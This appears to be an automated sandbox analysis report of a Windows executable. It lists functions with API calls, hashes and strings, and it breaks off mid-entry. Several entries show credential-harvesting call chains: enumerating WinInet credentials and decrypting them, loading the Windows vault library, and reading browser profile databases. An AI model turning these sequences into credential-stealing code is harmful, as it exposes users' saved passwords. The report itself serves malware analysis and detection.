String ID:
API String ID: 1350124489-0
Opcode ID: 8877abb31438fe43978ae0089ed33cf8c6d77ca2355832e400327e2f5169c828
Instruction ID: 7243842a5807b37debdaa9f9fde8f616664d19f88573030f3fe7b42aba0c3edd
Opcode Fuzzy Hash: 8877abb31438fe43978ae0089ed33cf8c6d77ca2355832e400327e2f5169c828
Instruction Fuzzy Hash: BE01D671A10114AFCB04DB55C906FEE77E4AF08704F00406EB009E7A81DBF8EE50CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00461DE0, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00461E43

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: d68a3bd22f305dbcdf3ffd64c52df88b5c137157129ae79b60548ab7b6333833
Instruction ID: 711b0ac0be213a932d3ef352accb4425466adec7032af4fa1479894d0dfa0f81
Opcode Fuzzy Hash: d68a3bd22f305dbcdf3ffd64c52df88b5c137157129ae79b60548ab7b6333833
Instruction Fuzzy Hash: 0F012172C00159AFCF01AFA9CC019EE7FB5AB08314F144166BD24E21A1E6368A64DB95

Uniqueness

Uniqueness Score: -1.00%

Function 0041DC5C, Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041DC61

Part of subcall function 0041D3A1: GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,?,00000000,?,0041DCA2,?,?,00000244,0048813C,00000000,?,0041E019), ref: 0041D3C0
Part of subcall function 0041D3A1: _strlen.LIBCMT ref: 0041D3C7

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CurrentDirectoryH_prolog_strlen
String ID:
API String ID: 1906034785-0
Opcode ID: c17ccda47640b9168209527bd5dfb50f76f294fdc34d0b7701c221342599e761
Instruction ID: 0171d2660a3615550cccc1e582925e2522cf56954e805473d7a149bee202ad58
Opcode Fuzzy Hash: c17ccda47640b9168209527bd5dfb50f76f294fdc34d0b7701c221342599e761
Instruction Fuzzy Hash: 030162B0A11702AED7589F39990669ABAE4AF85334F10472FE039D72D1EBB89500C798

Uniqueness

Uniqueness Score: -1.00%

Function 00411C87, Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 00411CD2

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Deallocate
String ID:
API String ID: 1075933841-0
Opcode ID: fdb8a7470ffb330f0a4a2e68f526105d38c5669cf11814628ee73044a898aadb
Instruction ID: 85e3cdac87251ddcd588db607793408364f76093cb41eae6786bec27a85264cf
Opcode Fuzzy Hash: fdb8a7470ffb330f0a4a2e68f526105d38c5669cf11814628ee73044a898aadb
Instruction Fuzzy Hash: 92F0F671201601AFA7089F65E9C4899F779FF49354360072BF01143191F7A5B8E0C7E9

Uniqueness

Uniqueness Score: -1.00%

Function 004561ED, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0045504D,00000001,00000364,00000008,000000FF,?,0043E9FE,00000002,00000000,?,?), ref: 0045622E

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 29070280c1e4d81f136a31d8cfd135065fa548665ef93aaffeb7400ebbf2659e
Instruction ID: 847d29e4f901aa00d0a72ea092d990173d9de85dfbb4b56b3dcee71cf7343eff
Opcode Fuzzy Hash: 29070280c1e4d81f136a31d8cfd135065fa548665ef93aaffeb7400ebbf2659e
Instruction Fuzzy Hash: 58F0243160412467DB217F66AC01B1B3B48AB51376F5680ABFC14A7282CF38DC0C86EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040A0EA, Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040A0EF

Part of subcall function 00409EE0: __EH_prolog.LIBCMT ref: 00409EE5
Part of subcall function 00409EE0: std::_Lockit::_Lockit.LIBCPMT ref: 00409EF5
Part of subcall function 00409EE0: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00409F32

Part of subcall function 0040A0B7: __Getctype.LIBCPMT ref: 0040A0D2

Part of subcall function 00409F56: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00409F73
Part of subcall function 00409F56: std::_Lockit::~_Lockit.LIBCPMT ref: 00409FE4

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::_$H_prologLocinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID:
API String ID: 1713013424-0
Opcode ID: 44a4c554f1629e7928147f4d8e328125e3df9b63ab6389b3dd8d8c7b9b3d6871
Instruction ID: dbb17162a2c983689f0205196013e467cd697d7809a81b381ff74a1a4f5d8208
Opcode Fuzzy Hash: 44a4c554f1629e7928147f4d8e328125e3df9b63ab6389b3dd8d8c7b9b3d6871
Instruction Fuzzy Hash: CFF096725002049BDB10EFA9C412B9DB764AF50714F10402FF405B72C1DB785914C68A

Uniqueness

Uniqueness Score: -1.00%

Function 0040B13C, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0040B156

Part of subcall function 0043BDA6: FindNextFileW.KERNEL32(?,?,?,0040B1BE,?,?,?,?,?,0040B24B,?,?,?,?,00000001), ref: 0043BDAF

Part of subcall function 0040B2ED: __EH_prolog.LIBCMT ref: 0040B2F2

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileFindH_prologNext___std_fs_directory_iterator_advance@8
String ID:
API String ID: 3477299189-0
Opcode ID: f5a59196baa7c2442f06a5ad6727a002d1a23da54b5a2416d0e8f32b1d227496
Instruction ID: 6d5f4c4320df3c3207484bb4d4c3b3b654f22fe5d04078a78230ce262dbd73f6
Opcode Fuzzy Hash: f5a59196baa7c2442f06a5ad6727a002d1a23da54b5a2416d0e8f32b1d227496
Instruction Fuzzy Hash: 96F089326005156BD710A655CC95B6AF369EF843A6F00047BD911A7281E778DC54C6DC

Uniqueness

Uniqueness Score: -1.00%

Function 004123D0, Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004123D5

Part of subcall function 00412C1F: __EH_prolog.LIBCMT ref: 00412C24

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: eff0bd8d011076788ea04e8d1dacdeef6884f615b9f9039878bec91036533b12
Instruction ID: 54cb1cf5572767d1d82c59c45062d7155bdd6e7181485155b2ce54e964530ad7
Opcode Fuzzy Hash: eff0bd8d011076788ea04e8d1dacdeef6884f615b9f9039878bec91036533b12
Instruction Fuzzy Hash: 3101F6786106049FC724CF18C549E9ABBF4FB08318B50855EE49997701E3B5ED04CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00456E6E, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0043C5D3,00000000,?,0043E9FE,00000002,00000000,?,?,?,004098D6,0043C5D3,00000004,00000000,00000000,00000000), ref: 00456EA0

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a6fb21d89fb4db277c153ff1d0ae5930977a4f4620132af269c727d48672cd39
Instruction ID: 53c9e930807db8be5f085ed35afa035c1b320ade1005e3436992db179a22e1b6
Opcode Fuzzy Hash: a6fb21d89fb4db277c153ff1d0ae5930977a4f4620132af269c727d48672cd39
Instruction Fuzzy Hash: DDE0E5391022255BDF213A62DC0675B3A4C9F417A2F5B0127FC14A7293DB2DDC0C85EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040B9A6, Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

___std_fs_copy_file@12.LIBCPMT ref: 0040B9CA

Part of subcall function 0040AEF8: __EH_prolog2.LIBCMT ref: 0040AEFF

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog2___std_fs_copy_file@12
String ID:
API String ID: 1952593469-0
Opcode ID: 869e9550c799578478f83636ca2a4750c881900a7813b7b7690d09a287bdde66
Instruction ID: e4544548118051daef7f75d03778f9687ea7d0103f495f932a22227390165630
Opcode Fuzzy Hash: 869e9550c799578478f83636ca2a4750c881900a7813b7b7690d09a287bdde66
Instruction Fuzzy Hash: 07E0D87161160057C624550E9D09E67B3AEDFC6725F10063FFA58936C0EF74AC5092FD

Uniqueness

Uniqueness Score: -1.00%

Function 00412C1F, Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00412C24

Part of subcall function 00412C75: __EH_prolog.LIBCMT ref: 00412C7A
Part of subcall function 00412C75: std::locale::_Init.LIBCPMT ref: 00412CC2

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$Initstd::locale::_
String ID:
API String ID: 1266419734-0
Opcode ID: b8f5b327a2d82b5f882e2c760630bea027dcbc530e65df5a4c37ad43cf8bfb36
Instruction ID: 3d0729599b47a4d64a56f1c761604a082f6ab169833f0e94052152ae0775f96a
Opcode Fuzzy Hash: b8f5b327a2d82b5f882e2c760630bea027dcbc530e65df5a4c37ad43cf8bfb36
Instruction Fuzzy Hash: 92F0FFB4A146119FCB29CF0CD945AAABBE4EB08354B10C56EF48A97301E7B4E900CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00412D37, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00412D3C

Part of subcall function 00412DD5: __EH_prolog.LIBCMT ref: 00412DDA
Part of subcall function 00412DD5: std::_Lockit::_Lockit.LIBCPMT ref: 00412DE8
Part of subcall function 00412DD5: int.LIBCPMT ref: 00412DFF
Part of subcall function 00412DD5: std::_Lockit::~_Lockit.LIBCPMT ref: 00412E4F

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prologLockitstd::_$Lockit::_Lockit::~_
String ID:
API String ID: 1350124489-0
Opcode ID: 6d4b93f26b5130bce160b7c032685fc7942e9eb786c4865aefa68f4583d19938
Instruction ID: 6ca8d102737af7b563ee75f74418cdaed02913d38cd57933073786ea71f8c28c
Opcode Fuzzy Hash: 6d4b93f26b5130bce160b7c032685fc7942e9eb786c4865aefa68f4583d19938
Instruction Fuzzy Hash: E5F05E75A001049FCB04DF94D545EADB7F4FF48308F50815EE4069B751DB39ED05CA29

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE9C, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

__EH_prolog2.LIBCMT ref: 0040AEA3

Part of subcall function 0040AB35: __EH_prolog.LIBCMT ref: 0040AB3A

Part of subcall function 00440DD3: KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,00000000,?,?,0043C5E1,00000000,00483608,?), ref: 00440E33

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DispatcherExceptionH_prologH_prolog2User
String ID:
API String ID: 3749479025-0
Opcode ID: 4e7353ad68782389ea9937d651800e97693f9a850decdef57930bd470944daaf
Instruction ID: 253633f172c08753e5f7c2f7e89273483160fdf2a3731a5e97f89052528532b8
Opcode Fuzzy Hash: 4e7353ad68782389ea9937d651800e97693f9a850decdef57930bd470944daaf
Instruction Fuzzy Hash: 05F05E32C10219ABDF15EBA1C885FDEBB79AF15304F40405AB305731A1EA786A48CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040B192, Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0040B1B9

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ___std_fs_directory_iterator_advance@8
String ID:
API String ID: 2610647541-0
Opcode ID: 047eef18bed44f5765a4942825d6ab30ddc67b9109baaa1ca3d8f87df913df75
Instruction ID: 25d901e0e73f84a404d8a5291ecba76db25b85ef8d43bcca90045d96cca3e000
Opcode Fuzzy Hash: 047eef18bed44f5765a4942825d6ab30ddc67b9109baaa1ca3d8f87df913df75
Instruction Fuzzy Hash: 00E0263911821014DA30A162587097312A4CE913E4B00403BE984AB2C0E7788C82D2EC

Uniqueness

Uniqueness Score: -1.00%

Function 00412716, Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 00412725

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Deallocate
String ID:
API String ID: 1075933841-0
Opcode ID: 364b9d473f46e18af8717e71b376f17cb0ed7698f74f83fde90ea7dc48cd984c
Instruction ID: 14660572932976111e5744dc907200ed3ed020f508c1aa0ec8d62dffa6614267
Opcode Fuzzy Hash: 364b9d473f46e18af8717e71b376f17cb0ed7698f74f83fde90ea7dc48cd984c
Instruction Fuzzy Hash: 2BD0A7310043008FF3345E18F1017A277E5EB01315F200E4EE0D1C65C1C7B96CC44799

Uniqueness

Uniqueness Score: -1.00%

Function 00461B27, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,00461F17,?,?,00000000,?,00461F17,00000000,0000000C), ref: 00461B44

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 37f07d10316231a3e6927486e7b454c93d54a57270a455bfb4fa70b0880c2275
Instruction ID: 09d5df6aac0d09fbcca49880e00712c4e9ba879e9b6c824d555ccd458945d788
Opcode Fuzzy Hash: 37f07d10316231a3e6927486e7b454c93d54a57270a455bfb4fa70b0880c2275
Instruction Fuzzy Hash: 3FD06C3204010DBBDF028F84DC06EDA3BAAFB48714F114050FA1866120C772E831AB96

Uniqueness

Uniqueness Score: -1.00%

Function 00432ADA, Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 00432AF5

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 9f78afeab412ba5f0fd3c9db364dbe7792eb239234d5aa7894e88aaff16fba57
Instruction ID: 7c7851cc52fc085232fcf294151c1b581f97f1e25a18ffa0b7055b06b0ba1da9
Opcode Fuzzy Hash: 9f78afeab412ba5f0fd3c9db364dbe7792eb239234d5aa7894e88aaff16fba57
Instruction Fuzzy Hash: 5AD0C97480810DEBCF50DF90D949AC9B7BCAB00308F0004A294C1E3140EAF4ABD99F91

Uniqueness

Uniqueness Score: -1.00%

Function 00443711, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00443724

Part of subcall function 00455CC3: RtlFreeHeap.NTDLL(00000000,00000000,?,0045F0EB,?,00000000,?,00000002,?,0045F38E,?,00000007,?,?,0045F78F,?), ref: 00455CD9
Part of subcall function 00455CC3: GetLastError.KERNEL32(?,?,0045F0EB,?,00000000,?,00000002,?,0045F38E,?,00000007,?,?,0045F78F,?,?), ref: 00455CEB

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: 8925af9abd318a9b441ad8db1b29933847fc925d80e1c06ca58724dd69863e2c
Instruction ID: 6f71e6dad7a1d3cb5cd6ac72f38f6d77ae52a4b0b053a9042af4472cebdba09c
Opcode Fuzzy Hash: 8925af9abd318a9b441ad8db1b29933847fc925d80e1c06ca58724dd69863e2c
Instruction Fuzzy Hash: 22C08C31000308BBCB019B42D916E8E7BB8DB80368F200048F82017242CAB1EF049680

Uniqueness

Uniqueness Score: -1.00%

Function 00427D8F, Relevance: 1.3, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00427D9E

Part of subcall function 00427783: CoCreateInstance.OLE32(0046AAC0,00000000,00000015,0046AAE0,?), ref: 004277A3

Part of subcall function 0042768F: lstrlenW.KERNEL32(?), ref: 004276B5
Part of subcall function 0042768F: lstrlenW.KERNEL32(00000002), ref: 004276C6
Part of subcall function 0042768F: CredEnumerateW.SECHOST(Microsoft_WinInet_*,00000000,00000000,?), ref: 004276EF
Part of subcall function 0042768F: CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000001,?), ref: 00427735
Part of subcall function 0042768F: LocalFree.KERNEL32(?), ref: 0042775F
Part of subcall function 0042768F: CredFree.ADVAPI32(?), ref: 00427778

Part of subcall function 00427858: GetVersionExW.KERNEL32(?), ref: 004278A0
Part of subcall function 00427858: LoadLibraryW.KERNEL32(vaultcli.dll), ref: 004278C4
Part of subcall function 00427858: GetProcAddress.KERNEL32(00000000,?), ref: 00427911
Part of subcall function 00427858: GetProcAddress.KERNEL32(00000000,?), ref: 0042794D
Part of subcall function 00427858: GetProcAddress.KERNEL32(00000000,?), ref: 00427984
Part of subcall function 00427858: GetProcAddress.KERNEL32(00000000,?), ref: 004279BF

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$CredFreelstrlen$CreateCryptDataEnumerateInitializeInstanceLibraryLoadLocalUnprotectVersion
String ID:
API String ID: 1367598280-0
Opcode ID: 73a30e18786cb528853aee05f0e97c6d854706650da80f74adb821e94201939a
Instruction ID: ff52a9f57ead188c9978fb1c845c19fe5801ab72b6978429f73bbfd0c44490d0
Opcode Fuzzy Hash: 73a30e18786cb528853aee05f0e97c6d854706650da80f74adb821e94201939a
Instruction Fuzzy Hash: ACE0C23011C2046BC204EB14DD07B6EB3D4EB81B19F80461DB89C021D0FF78BD04EA4B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004203FE, Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 596COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00420403
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000001,00000000), ref: 0042042F

Part of subcall function 004324C8: __EH_prolog.LIBCMT ref: 004324CD
Part of subcall function 004324C8: _strcat.LIBCMT ref: 00432525

Part of subcall function 0040B434: __EH_prolog.LIBCMT ref: 0040B439

Part of subcall function 004124F9: _Deallocate.LIBCONCRT ref: 0041250E

Part of subcall function 00412716: _Deallocate.LIBCONCRT ref: 00412725

sqlite3_finalize.NSS3(?), ref: 00420BF9
sqlite3_close.NSS3(?), ref: 00420C06

Strings

}, xrefs: 00420A27
^, xrefs: 00420B3F
!ustd, xrefs: 0042099E
=iohx, xrefs: 0042091B
t, xrefs: 00420955
;7!, xrefs: 004206F2
7qv{dr, xrefs: 004209C7
xW, xrefs: 00420BAD
Profiles, xrefs: 00420441

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$Deallocate$FolderPath_strcatsqlite3_closesqlite3_finalize
String ID: !ustd$7qv{dr$;7!$=iohx$Profiles$^$t$xW$}
API String ID: 1363784328-2016524471
Opcode ID: a929aa0753848bc2b85b5ec4357a091641c1c73ddebc623153432f86b00235dc
Instruction ID: 241e1253800f60ef7accb2d1a73c7ae488be48c975e036e9dfbe6108a026cd8a
Opcode Fuzzy Hash: a929aa0753848bc2b85b5ec4357a091641c1c73ddebc623153432f86b00235dc
Instruction Fuzzy Hash: 0C42ED30E042A89EDF15DBA4D880BDDBBB1AF55304F5041AED44977282EB741E89CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0042837C, Relevance: 19.6, APIs: 6, Strings: 5, Instructions: 320fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00428381
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00428492
CloseHandle.KERNEL32(00000000), ref: 004284A0
GetFileSize.KERNEL32(00000000,00000000), ref: 004284DC
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00428505
CloseHandle.KERNEL32(00000000), ref: 0042850C

Part of subcall function 0040BF84: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,?,?,?,?,00000000,00000000,?), ref: 0040BF97
Part of subcall function 0040BF84: DeleteFileTransactedA.KERNEL32 ref: 0040BFAE
Part of subcall function 0040BF84: CommitTransaction.KTMW32(00000000,?,00000000,?,?,?,?,00000000,00000000,?,?,?,004184D2,00000012,00000000), ref: 0040BFB9

Strings

G, xrefs: 004284AF
9170, xrefs: 00428568
^D, xrefs: 00428731
vBB], xrefs: 0042866B
w?%, xrefs: 0042863E

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseCreateHandleTransaction$CommitDeleteH_prologReadSizeTransacted
String ID: 9170$G$^D$vBB]$w?%
API String ID: 604483397-2850466166
Opcode ID: 3672df5d62917f140b23acf3bff87cb254679fb0147e1ee5cb0c4a8f8d1fe458
Instruction ID: e217c8ab33eda1d5385afcb944dc05228d9a3f46efac7ce554c40c7e615163ff
Opcode Fuzzy Hash: 3672df5d62917f140b23acf3bff87cb254679fb0147e1ee5cb0c4a8f8d1fe458
Instruction Fuzzy Hash: CAD1E230D012A8DADF15EBA4DA90BEEBB74AF15304F5041EED44977242DB781B88CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0040C12D, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 152memoryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040C132
BCryptOpenAlgorithmProvider.BCRYPT(?,AES,00000000,00000000), ref: 0040C198
BCryptSetProperty.BCRYPT(?,ChainingMode,ChainingModeGCM,00000020,00000000), ref: 0040C1B6
BCryptGenerateSymmetricKey.BCRYPT(?,00000010,00000000,00000000,?,00000020,00000000), ref: 0040C1D7
LocalAlloc.KERNEL32(00000040,?), ref: 0040C22E
BCryptDecrypt.BCRYPT(00000010,?,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0040C259
BCryptCloseAlgorithmProvider.BCRYPT(00000000,00000000), ref: 0040C2C0
BCryptDestroyKey.BCRYPT(00000000), ref: 0040C2D0

Strings

AES, xrefs: 0040C192
ChainingModeGCM, xrefs: 0040C1A9
ChainingMode, xrefs: 0040C1AE

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Crypt$AlgorithmProvider$AllocCloseDecryptDestroyGenerateH_prologLocalOpenPropertySymmetric
String ID: AES$ChainingMode$ChainingModeGCM
API String ID: 709062000-1213888626
Opcode ID: 28fd5f9bc862b26f59799d8040dbb27ff7c037f1159c71379a7fbd98449a5c77
Instruction ID: b2c87a47a667178e0e2eb8f5e519d097f5ae701139850b2879dcce6678763003
Opcode Fuzzy Hash: 28fd5f9bc862b26f59799d8040dbb27ff7c037f1159c71379a7fbd98449a5c77
Instruction Fuzzy Hash: D9513CB1A00209EFDB10DF95C985AEEBBB8FF04704F10456EF505A6291E7789A44CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00460011, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 00454EAB: GetLastError.KERNEL32(?,00000000,?,004427D1,00000000,00000000,?,?,0044EC7C,00000000,00000000,00000000,00000000,?), ref: 00454EB0
Part of subcall function 00454EAB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0044EC7C,00000000,00000000,00000000,00000000,?), ref: 00454F4E

GetACP.KERNEL32(?,?,?,?,?,?,004532E0,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 004600D2
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004532E0,?,?,?,00000055,?,-00000050,?,?), ref: 004600FD
_wcschr.LIBVCRUNTIME ref: 00460191
_wcschr.LIBVCRUNTIME ref: 0046019F
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00460260

Strings

utf8, xrefs: 004601CF

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: ac257f00cce8d63af76c1065c713e6c1fc7335e351beaece06fe0a36af53568d
Instruction ID: 1ef8fd9219a04123247e1f42a064bc0eabd8d4314fa2983b105f1a70ee0a62ee
Opcode Fuzzy Hash: ac257f00cce8d63af76c1065c713e6c1fc7335e351beaece06fe0a36af53568d
Instruction Fuzzy Hash: 06711631640202ABDB24AB26DC46BAB73A8EF45344F14443BF90597282FBBDD945876B

Uniqueness

Uniqueness Score: -1.00%

Function 00414A8F, Relevance: 10.4, APIs: 2, Strings: 3, Instructions: 1618COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00414A94

Part of subcall function 00413162: _memcmp.LIBVCRUNTIME ref: 00413186

GetDriveTypeA.KERNEL32(?,?,?,00000018,00000000,00000001,Function_00087A34,?,?,0047734B,0047734B), ref: 00414CC2

Part of subcall function 004359EB: __EH_prolog.LIBCMT ref: 004359F0

Part of subcall function 00412716: _Deallocate.LIBCONCRT ref: 00412725

Part of subcall function 004149CD: ___std_fs_get_stats@16.LIBCPMT ref: 004149ED

Part of subcall function 00414A2D: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00000000,?,00000000,?,?,00417C45,?,?,?), ref: 00414A43
Part of subcall function 00414A2D: CopyFileTransactedA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00414A69
Part of subcall function 00414A2D: CommitTransaction.KTMW32(00000000,?,00417C45,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 00414A74

Part of subcall function 004124F9: _Deallocate.LIBCONCRT ref: 0041250E

Strings

0, xrefs: 00416087
9, xrefs: 00414CD2
, xrefs: 00415824

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeallocateH_prologTransaction$CommitCopyCreateDriveFileTransactedType___std_fs_get_stats@16_memcmp
String ID: $0$9
API String ID: 1200102914-2721410126
Opcode ID: 5558a3146107c0c6a3de0913783e7e5c897cd353dc2df4e6aa59759c2a789afb
Instruction ID: 08687a302b871ca085357ddba940e9f56129156d466b08fd6ea1630242dd369e
Opcode Fuzzy Hash: 5558a3146107c0c6a3de0913783e7e5c897cd353dc2df4e6aa59759c2a789afb
Instruction Fuzzy Hash: CDE2D030D00259DBCF18EBA5C991AEDB7B1BF54304F1042AEE446B7282DB785F89CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004623DB, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00462556

Strings

1#SNAN, xrefs: 004636ED
1#IND, xrefs: 004636E6
1#QNAN, xrefs: 004636F4
1#INF, xrefs: 00463711

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 6b4554104b55d4d67c64e4bcbb184ffb08a733430d848cecfc87239b6626655d
Instruction ID: 170545d849ef6a493fb3b16326654a495bc13c3797caf2357ca581597c4d5a7c
Opcode Fuzzy Hash: 6b4554104b55d4d67c64e4bcbb184ffb08a733430d848cecfc87239b6626655d
Instruction Fuzzy Hash: D1C23C71E046289FDB25CE28DD407EAB3B5EB48305F1441EBD84EE7240E779AE858F46

Uniqueness

Uniqueness Score: -1.00%

Function 0046079D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

